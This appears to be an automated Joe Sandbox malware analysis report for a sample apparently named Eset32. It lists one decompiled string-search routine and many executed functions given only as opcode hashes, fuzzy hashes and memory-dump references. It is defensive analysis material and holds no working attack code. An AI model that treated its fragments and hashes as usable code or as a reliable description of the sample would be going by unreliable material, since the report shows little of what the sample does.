                                                          Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                          0x00405c05
                                                          0x00405c07
                                                          0x00405c0a
                                                          0x00405c36
                                                          0x00405c0f
                                                          0x00405c18
                                                          0x00405c1d
                                                          0x00405c28
                                                          0x00405c2b
                                                          0x00405c47
                                                          0x00405c2d
                                                          0x00405c34
                                                          0x00000000
                                                          0x00405c34
                                                          0x00405c40
                                                          0x00405c44
                                                          0x00405c44
                                                          0x00405c3e
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                          • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 00007FF9F09BD816 Relevance: 1.7, Strings: 1, Instructions: 474COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8eO
                                                          • API String ID: 0-4281317609
                                                          • Opcode ID: 2bcdf6225b0516abb3ab0b6ac71b5af0f2dab179e4eb80539156a20e21010df7
                                                          • Instruction ID: 79d40750a16e976ecd878d04d928d8ce650e43e9efa762dc5b45b2cd86ff988b
                                                          • Opcode Fuzzy Hash: 2bcdf6225b0516abb3ab0b6ac71b5af0f2dab179e4eb80539156a20e21010df7
                                                          • Instruction Fuzzy Hash: FCF19470509A8D8FEBA8DF28C8457E937D1FF55310F04826AE85DC7391EF74A9858B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09BE5C2 Relevance: 1.7, Strings: 1, Instructions: 461COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8eO
                                                          • API String ID: 0-4281317609
                                                          • Opcode ID: 8f5b8f7892b6553865b0910283f89509a801bbdd42d0d5982866f1653d9ff4aa
                                                          • Instruction ID: e2f3b69af66d5185ed343e0a85db547af7f5bc1f15801fc1806155d36594d02a
                                                          • Opcode Fuzzy Hash: 8f5b8f7892b6553865b0910283f89509a801bbdd42d0d5982866f1653d9ff4aa
                                                          • Instruction Fuzzy Hash: FDE1C670908A4E8FEBA8DF28C8557E977D2FF54310F04826EE81DC72A1DF74A9858781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B2BC9 Relevance: .2, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 879e086325a01ef0ce40e15d78996a664e69dcd4bba0b30e3697c9c6dd98dba0
                                                          • Instruction ID: ca9890383825148f16b80b34c5001486dd8fcb00c9b6b65289a89301bcc91dd9
                                                          • Opcode Fuzzy Hash: 879e086325a01ef0ce40e15d78996a664e69dcd4bba0b30e3697c9c6dd98dba0
                                                          • Instruction Fuzzy Hash: ED418E31A0C64D1FD71EDF7888152A57B95EB86320B15C2BFE49AC72E3EC2469468391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B99EB Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HO
                                                          • API String ID: 0-2658130301
                                                          • Opcode ID: 9264f1dc226bca6e359f13110af5c216ecb1d454edce0cdaef99987700e1fa7e
                                                          • Instruction ID: 343a5a67b75af78b47d5fe18bf2227ca898b4bc1b26ab9caf51ea21216a95e02
                                                          • Opcode Fuzzy Hash: 9264f1dc226bca6e359f13110af5c216ecb1d454edce0cdaef99987700e1fa7e
                                                          • Instruction Fuzzy Hash: 7941B471A286098BEB5CEB6C94452B877E5FF95311F14417ED50EC32E6EE34B9828B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B99AA Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: qO\
                                                          • API String ID: 0-1593305758
                                                          • Opcode ID: a52f3b4f9dfd11875f25ec799f1136fbc46d19d6e573606f2e0cfea96cd8bed4
                                                          • Instruction ID: a34c5433f7b6c6330c8c50e68e66fcb57b90abe806529cea57c3846dd0d06e82
                                                          • Opcode Fuzzy Hash: a52f3b4f9dfd11875f25ec799f1136fbc46d19d6e573606f2e0cfea96cd8bed4
                                                          • Instruction Fuzzy Hash: B3210A7261C5198FE71CEA2898565F833D5FB85331B20423FD94BC73F2ED69B9424684
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B9B0D Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: qO\
                                                          • API String ID: 0-1593305758
                                                          • Opcode ID: 6f6a514c60562ff394cba2b3d14123e30f7c2f1834bf0983a6ea79f08827c0b0
                                                          • Instruction ID: ac4f0347a89085f987ccb495b82f18f208be70b3a572cab49bddfe53570849a3
                                                          • Opcode Fuzzy Hash: 6f6a514c60562ff394cba2b3d14123e30f7c2f1834bf0983a6ea79f08827c0b0
                                                          • Instruction Fuzzy Hash: 95216271A2852D8BE758EB2898563B837E5FB95311F5001B9D90EC33F6ED7879828740
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B1879 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H37
                                                          • API String ID: 0-3441345877
                                                          • Opcode ID: 01438e7833dec29b933500b411c715dff41d37d4d22b47bd68721978c4cd4294
                                                          • Instruction ID: 051d7fff81f5cdd1d8373e5f92eaf74ad11ec62644cd6672139e36042363ca7f
                                                          • Opcode Fuzzy Hash: 01438e7833dec29b933500b411c715dff41d37d4d22b47bd68721978c4cd4294
                                                          • Instruction Fuzzy Hash: 93F0867092C7419B834CDF188486426B7F5FF89B04F50953DF19A43292DB74F8018A83
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B72A3 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: E/S
                                                          • API String ID: 0-5097534
                                                          • Opcode ID: 9d0c395bd7c272d2469946692f130c8b7e54979fa5cd6417f079119fe14fda11
                                                          • Instruction ID: 0c93847ea0deccbad4bf0d601695c6e65bf1cba1a3bd1a7fa24566d4afb369e4
                                                          • Opcode Fuzzy Hash: 9d0c395bd7c272d2469946692f130c8b7e54979fa5cd6417f079119fe14fda11
                                                          • Instruction Fuzzy Hash: 9AD012B2E188470BF7E4AB6850017715BD5FF98B90F544274E16DC73F6ED9C2D164240
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B764E Relevance: 1.3, Strings: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: OrKB
                                                          • API String ID: 0-1041866043
                                                          • Opcode ID: 247475a86c09f109c20e9ab34f71523881367323d9dc15f8ec7c13e1f8bc5bac
                                                          • Instruction ID: 889c94328190385810abab75c393ab8660fde9aed7ad4d837df28591374fac72
                                                          • Opcode Fuzzy Hash: 247475a86c09f109c20e9ab34f71523881367323d9dc15f8ec7c13e1f8bc5bac
                                                          • Instruction Fuzzy Hash: 1DC09B57E0CC0B42F254B6DC24556750645FFD1794F457035D21D5F3E1DD5C690E0152
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B0088 Relevance: .4, Instructions: 399COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0eee5b60a1fb44d7032adcda0859de88d3fb549bf45f5e4a72adc782fe03106b
                                                          • Instruction ID: 1637ba135f7e2805896e3e82495cdb9d5d39dd958cb23046918fd24a1a289208
                                                          • Opcode Fuzzy Hash: 0eee5b60a1fb44d7032adcda0859de88d3fb549bf45f5e4a72adc782fe03106b
                                                          • Instruction Fuzzy Hash: 75C14861E0CA4A4BE71AE77854152B1BBD5EF96320F0482BED16EC72F3FD58B8458381
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09BE1D6 Relevance: .3, Instructions: 332COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d72c86e66e71d6a942eed8a8a4bc0b66de2860bd4d1708b9c562f03b02f9d8c9
                                                          • Instruction ID: 8b650898b8b4e2e219951ffb442fa6f79702dc9b56556f53be0c16616983ec69
                                                          • Opcode Fuzzy Hash: d72c86e66e71d6a942eed8a8a4bc0b66de2860bd4d1708b9c562f03b02f9d8c9
                                                          • Instruction Fuzzy Hash: 97B19570508A4D8FEB68DF28D8457E93BD1FF55310F04826EE85DC72A2DE74A9858B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B20E8 Relevance: .3, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b7a8c7c4608d80156c69bb455b8f32e0b6f95870cd729f18f22c9329e536219
                                                          • Instruction ID: 7344da6a6072eb0f8aa3e7db0add33cd57e0639ec8dba5f29aca4e0f6ea43484
                                                          • Opcode Fuzzy Hash: 0b7a8c7c4608d80156c69bb455b8f32e0b6f95870cd729f18f22c9329e536219
                                                          • Instruction Fuzzy Hash: 8B811262E0CA8A4BE756FB7844516E1BBD0FF56310F0442BAD1AEC72E3FD68B8458351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B9558 Relevance: .3, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adede60bc487cb0c1e1c8ae7cbf5fbd124d1f71343fb39bdaf4334ae0fe49bf6
                                                          • Instruction ID: 74f923a18053efdf53c7e7358ba009c38028c1daf75f1402eaf954644a829e23
                                                          • Opcode Fuzzy Hash: adede60bc487cb0c1e1c8ae7cbf5fbd124d1f71343fb39bdaf4334ae0fe49bf6
                                                          • Instruction Fuzzy Hash: 9F71493051CBC90FE32AD62848455B07BE5DF933157288ABAC8EBC71A3F958F9478781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B8838 Relevance: .2, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6cadb6c08a25b47ffa0d15023c816d56c50a9af46a4ec41f371bbb79453fe58b
                                                          • Instruction ID: 6b75d520fbebdfaf54a425ae91a8a420fe04c394c75022c92c2b14c50e5831d5
                                                          • Opcode Fuzzy Hash: 6cadb6c08a25b47ffa0d15023c816d56c50a9af46a4ec41f371bbb79453fe58b
                                                          • Instruction Fuzzy Hash: 18615D70B0C9098FDB48EB6CD459AA877E1FF99310B05017AE50DC73A2EE24EC828741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B01A0 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 167730cc9d58064fcbae06e0a9bd71eb44dce360053d8f79f54f6852b0da1dfc
                                                          • Instruction ID: 8c35cad2c3bae5ed50629e812e3ace9de37a7e7ef705dfb5ea147ab39b7cd5c8
                                                          • Opcode Fuzzy Hash: 167730cc9d58064fcbae06e0a9bd71eb44dce360053d8f79f54f6852b0da1dfc
                                                          • Instruction Fuzzy Hash: AB610F62E0CA0A4BE755FB7894516E2E7C5FFA4310F04827AE16EC32E3FE68B5458750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B7381 Relevance: .2, Instructions: 213COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88961debbd31c18d7ce16a9446617d1fc1245cacdfa8286f1229c75d98097434
                                                          • Instruction ID: 1a7f3af75740ffee6300c0b34d9ba7d8e4f10e18d4d1f64b5ab2e7acba4ffb6f
                                                          • Opcode Fuzzy Hash: 88961debbd31c18d7ce16a9446617d1fc1245cacdfa8286f1229c75d98097434
                                                          • Instruction Fuzzy Hash: BC514B72F0C90A4BE768EB6888552B5B7D2FF99350B1442BAD10EC73F6DD686D468380
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09BB10C Relevance: .2, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ab42dae51f42a79e39fc6269dc982cdfa9e27102e1ebec5c6f765ff0fc532c8
                                                          • Instruction ID: 700d7ae9dec0fa937b5ed8477516b8e77732aa0e5f54d29ca3ae649175a83030
                                                          • Opcode Fuzzy Hash: 7ab42dae51f42a79e39fc6269dc982cdfa9e27102e1ebec5c6f765ff0fc532c8
                                                          • Instruction Fuzzy Hash: ED517171908A1C8FDB54DB58D845BE9BBF1FB59310F0482AAD00DD3292DE74A9858F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B966C Relevance: .2, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e95394fcf18463c41280cf76a6cf9123e54698b5217a1503bea68bf2e3707ccd
                                                          • Instruction ID: 99179291009a888b696d77aef8c63e4e375904467827d1e73c83dd65191c6d25
                                                          • Opcode Fuzzy Hash: e95394fcf18463c41280cf76a6cf9123e54698b5217a1503bea68bf2e3707ccd
                                                          • Instruction Fuzzy Hash: 0A51576191CBC90FD31AD73848522B53BE5DF97310B1885FAC5DACB2E3F858A8438392
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B899E Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ad7be040650a83c0ab03c229ecf8bc9fab7c6eab2c0d0ffe16c7857047e4321f
                                                          • Instruction ID: e660e7af76e90cbc5e964782fcc572d9bdb0fc5f06a1269d0acc286435c092b3
                                                          • Opcode Fuzzy Hash: ad7be040650a83c0ab03c229ecf8bc9fab7c6eab2c0d0ffe16c7857047e4321f
                                                          • Instruction Fuzzy Hash: 95418171B189098FDB88EF6CD459AA977E1FF9D311B05007AE54EC72A2DE64EC428B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B4040 Relevance: .2, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7da973902554b4a3db343bacb50512ee0907beec33641aa1a6696d707f0aab0
                                                          • Instruction ID: e0daf46bbb80044cd8d92ce915fc1f905c19119f779f52bd09ea0fcea770e0e6
                                                          • Opcode Fuzzy Hash: a7da973902554b4a3db343bacb50512ee0907beec33641aa1a6696d707f0aab0
                                                          • Instruction Fuzzy Hash: BB51D66050D7C64FE30AD7388C542747B75DF63310B2942FBC596CB2E7E958698A8352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B3745 Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21a746b7cdbcb951a9a2c8e45f872480e2342ea6afbef355401a238da65c39a7
                                                          • Instruction ID: 12ccb8569c7d3950d63689fe946d1ba78a0a4a2d32f5b8a96cd18afe44d92ed1
                                                          • Opcode Fuzzy Hash: 21a746b7cdbcb951a9a2c8e45f872480e2342ea6afbef355401a238da65c39a7
                                                          • Instruction Fuzzy Hash: A7416AA240E3C44FD30B8B349C666913FB5DF13220B0A41EBD481CB1F3E9586D4AC7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B9871 Relevance: .1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6455bd712aa33f282d92161c5995d76d65837bc9ec2e0df20828de4af4a24afa
                                                          • Instruction ID: cfac4148245de7db05f082e7f6a7f8dd9a24bff7a6afb0d9eb1b406a5278a12c
                                                          • Opcode Fuzzy Hash: 6455bd712aa33f282d92161c5995d76d65837bc9ec2e0df20828de4af4a24afa
                                                          • Instruction Fuzzy Hash: 7E31036191C7854FE3668B3848556763BE8DF47320F1842BED89AC72E3ED9868428382
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B01C8 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5367e29db2958b205bfd51dd6754d5f1cf4fcc8a709b62df83575d1f5c51d912
                                                          • Instruction ID: 474bfc30b340d3f280244f8a2cdc39ffee49df0b762ac77834116ed29520cd80
                                                          • Opcode Fuzzy Hash: 5367e29db2958b205bfd51dd6754d5f1cf4fcc8a709b62df83575d1f5c51d912
                                                          • Instruction Fuzzy Hash: 2A11E27260C50D1FA72CD92C9C0A5B7B3DAE7C6230B51933EE597C26A6EDA1A95342C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B34B4 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73b44f8d8d0f3bce89a11c2ac170a8b45a2d5cb1ef7bc6c40940fff8b722a3d2
                                                          • Instruction ID: 08934b4f9861ec72fba738ec03e15a21294eafa0b417ea912afbabde3e8f08f3
                                                          • Opcode Fuzzy Hash: 73b44f8d8d0f3bce89a11c2ac170a8b45a2d5cb1ef7bc6c40940fff8b722a3d2
                                                          • Instruction Fuzzy Hash: 5B314C6240E3C15FD30B872488625A67FB0AF53214B2A85EFD1D6CF5F3D5186A4AC362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B2A39 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1371eb4053c4739ef91059e6c85759a438b6da354d79d3960367f5c947019f4c
                                                          • Instruction ID: 1aeab6fbff3b21900002e107c25e84559228dd7b10cb6c21bacf7af09efc41b3
                                                          • Opcode Fuzzy Hash: 1371eb4053c4739ef91059e6c85759a438b6da354d79d3960367f5c947019f4c
                                                          • Instruction Fuzzy Hash: B9319F3094E7C54FD317A77488212507FB1AF83324B1945EBD099CB6F3EA6D698AC322
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B749E Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
